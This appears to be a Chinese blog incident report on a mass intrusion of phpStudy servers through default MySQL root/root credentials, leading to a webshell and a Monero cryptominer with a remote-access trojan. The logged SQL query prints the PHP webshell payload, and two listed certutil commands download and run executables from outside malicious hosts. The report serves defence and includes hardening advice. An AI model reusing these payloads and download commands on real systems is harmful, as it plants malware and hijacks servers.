针对phpStudy网站服务器的入侵详解编程语言

今天客户服务器上出现报警,查找了下原因,发现根目录下有wk.php

E:/phpStudy/MySQL/bin/mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with: 
TCP Port: 3306, Named Pipe: MySQL 
Time                 Id Command    Argument 
         2173 Quit     
190207 18:31:59     2174 Connect    [email protected] on  
         2174 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci' 
         2174 Init DB    mysql 
         2174 Init DB    mysql 
         2174 Query    SELECT '<?php @system("certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe");@phpinfo();@system("certutil.exe -urlcache -split -f http://14.29.194.121:22/server_sql.php");@sleep(2);@system('wk.exe');?>' 
         2174 Query    SHOW VARIABLES LIKE 'language' 
         2174 Quit     
190207 18:32:00     2175 Connect    [email protected] on  
         2175 Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci' 
         2175 Init DB    mysql 
         2175 Init DB    mysql 
         2175 Query    set global general_log='off'

查了下原因,是针对phpStudy网站服务器进行批量入侵的挖矿木马

攻击者对互联网上的服务器进行批量扫描,发现易受攻击的phpStudy系统后,利用用户在安装时未进行修改的MySQL弱密码进行登录,并进一步植入WebShell,然后通过shell下载挖矿木马挖门罗币。

针对phpStudy网站服务器的入侵详解编程语言

 中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码root/root,且开启在外网3306端口,在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。

特点:

  (1)都是通过探测phpStudy搭建的php环境进行攻击

  (2)通过webshell植入挖矿木马时,白利用certutil.exe

命令1

certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe

命令2

certutil.exe  -urlcache  -split  -f  http://m4.rui2.net/upload/12/2016/10/wk.exe  &wk.exe

  (3)挖矿木马通过bat脚本启动,且矿机采用xmr-stak挖矿工具

  (4)在挖矿的同时植入大灰狼远控木马

安全建议:

  (1)修复系统漏洞

  (2)集成环境,在安装结束后应及时修改MySQL密码为强密码,最低密码长度不要低于11位,组合最好是字母数字和符号;删除l.php(探针文件),避免被黑客探测入侵

  (3)增加安全策略

参考:https://s.tencent.com/research/report/642.html

原创文章,作者:Maggie-Hunter,如若转载,请注明出处:https://blog.ytso.com/20370.html

(0)
上一篇 2021年7月19日
下一篇 2021年7月19日

相关推荐

发表回复

登录后才能评论